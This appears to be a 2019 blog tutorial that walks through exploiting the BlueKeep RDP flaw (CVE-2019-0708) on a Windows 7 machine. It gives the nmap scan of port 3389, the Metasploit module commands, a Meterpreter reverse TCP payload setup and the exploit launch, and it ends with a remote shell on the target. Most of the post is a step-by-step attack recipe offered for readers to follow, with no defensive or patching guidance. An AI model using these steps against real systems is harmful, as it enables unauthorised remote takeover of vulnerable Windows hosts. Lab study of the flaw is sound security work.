BlueKeep – Exploit Windows (RDP Vulnerability) Remotely

Remote desktop protocol (RDP) is a secure network communications protocol designed for remote management, as well as for remote access to virtual desktops, applications and an RDP terminal server.

RDP allows network administrators to remotely diagnose and resolve problems individual subscribers encounter. RDP is available for most versions of the Windows operating system. RDP for Apple macOS is also an option. An open source version is available, as well.

But RDP has a vulnerability on Windows7, so we will be demonstrating that today. So let’s open up a command prompt and get started.

RDP runs on port 3389 TCP, so first we will need to see if the device we are attacking uses this protocol. For this we will use nmap and specify port 3389 in our scan. All we will need is the IP of the Windows7 machine. Ours in this case is

nmap -sV -p 3389

The command above will scan, looking specifically to see if port 3389 is in use, we can see the the -p flag denotes the port. So let’s see the results of the scan.


As we can see, our Windows7 box does indeed use port 3389. Now let’s move on the the exploit. Firstly, we will need to open up Metasploit.


Next we will search for the exploit we are looking for, in our case, Bluekeep.

search bluekeep


So here we can see two exploits, both for Bluekeep, but we will only need the bottom one. So let’s use that.

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce


Once we can see the exploit in red, we know that we are now using it. So let’s look for some more information on this exploit.



So it gives us an explanation as to how this exploit is able to improperly handle binds to get code execution. Perfect. Next we will need to tell Metasploit the IP of the target Windows7 machine.



Once that s set up we can go ahead and give it the payload that we want to use, along with the exploit, to get a reverse TCP shell.

set payload windows/x64/meterpreter/reverse_tcp

So we are specifying the Windows operating system, the 64 bit architecture and asking for a TCP reverse shell with a Meterpreter session. A couple more things we need to do is to give Metasploit our attacking machine’s IP and port number to listen on.


set LPORT 4444


We are specifying the port 4444 to listen on simply because we know there is no other service running on that port. So now we want to see what target option Metasploit gives us.

show targets


We already know from our nmap scan earlier that the Windows7 box is running on VMWare, Virtualbox to be precise, so we will choose number 2 in the list.

set target 2


If you have all that set up, the final step is to exploit the target machine.



We can see that the exploit is trying to work. We can also see that it tells us that the target is vulnerable. This exploit should just take a minute for the code to execute.


BOOM!! we have a Meterpreter shell from the target machine!! This is how Bluekeep works.

Thanks for reading guys, please return for more posts like this and give us suggestions as to what you’d like us to post about.

Also, don’t forget to subscribe, share and like, thanks in advance!!

Zxer197 2019-10-10


Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.